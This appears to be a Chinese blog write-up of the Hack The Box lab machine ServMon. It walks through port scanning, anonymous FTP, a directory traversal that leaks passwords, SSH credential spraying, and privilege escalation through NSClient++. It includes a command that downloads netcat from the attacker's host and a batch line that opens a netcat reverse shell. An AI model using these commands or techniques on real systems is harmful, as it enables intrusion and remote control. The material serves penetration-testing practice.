【Hack The Box】windows练习-- ServMon
Windows -- The 练习 Box Hack
2023-09-27 14:26:30 时间
HTB 学习笔记
【Hack The Box】windows练习-- ServMon
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
信息收集
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-27-22 10:08PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
80/tcp open http
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
把这几个先枚举了,发现啥也干不了
就看ftp因为可以匿名登陆
所以进去看看有没有信息
首先就是两个用户名,然后还有一个密码文件得去找找,但是ftp里刚才也没看到啊
尝试了一下目录遍历,但是啥都没搞出来
于是去谷歌搜了一下这个NVMS-1000
然后搜到了一个目录遍历
目录遍历
整了这么多个密码,做个密码本,用户名本就用那两个人就行
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
登陆
crackmapexec ssh 10.129.227.75 -u user.txt -p pass.txt
账号密码如下
nadine / L1k3B1gBut7s@W0rk
登陆之后,先进行内核之类的枚举
然后在这里发现了一个可以的服务,program fils也是必须查看的目录
而且我们在之前看到的那个note中,也能看到相关信息
进去以后,看到了一个ini文件
ini就相当于linux中的config文件,我是这么认为的
然后就发现了一个密码,并且在下面还能看到是只允许本地登陆
是8443
ssh隧道搭建
ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443
iwr http://10.10.14.52:8000/nc64.exe -Outfile C:\Temp\nc.exe
bat脚本编写是这样的
\Temp\nc.exe 10.10.14.13 8888 -e cmd
登陆本地8443,按图配置,value树枝都会上传脚本以及nc,来反弹端口
我们现在将通过在调度程序中添加一个新部分来重复该过程,路径如下 /settings/scheduler 。 现在将 shell 的键和值设置为 interval = 1m 并添加更改。
相关文章
- 【计算机视觉】深度相机(八)--OpenNI及与Kinect for windows SDK的比较
- logback--日志在windows上可以打印,在linux上不能打印的问题
- Windows下编程--模拟时钟的实现
- IIS异常:CS0016: 未能写入输出文件“c:WINDOWSMicrosoft.NETFramework.。。”--“拒绝访问
- 04 Windows编程——Unicode
- 让你用sublime写出最完美的python代码--windows环境
- ECS快速在windows环境下部署Mysql
- 将任意程序安装成windows服务
- 【Hack The Box】windows练习-- Timelapse
- 【Hack The Box】windows练习-- Reel
- 【Hack The Box】windows练习-- Resolute
- 【Hack The Box】windows练习-- Fuse
- 【Hack The Box】windows练习-- Active
- 【Hack The Box】windows练习-- jerry
- 【Hack The Box】windows练习-- Bounty
- 【Hack The Box】windows练习-- blue
- 【Hack The Box】windows练习-- Bastard
- 【Hack The Box】windows练习-- Optimum
- 【Hack The Box】windows练习-- devel
- Redis于windows在安装
- caffe训练自己的图片进行分类预测--windows平台
- Windows Internet编程基础--WinInet
- RPC与实践(thrift在windows的编译/安装--c++版)
- C++信号量实现线程间同步,windows使用SetEvent,linux使用sem_t,QT测试
- 【一】ODB - C++ 访问数据库的利器--Hello World On Windows(Version-24)
- Windows SDK笔记(经典--一定要看)
- Developing Universal Windows Apps 开发UWA应用 问答
- windows下RocketMQ安装部署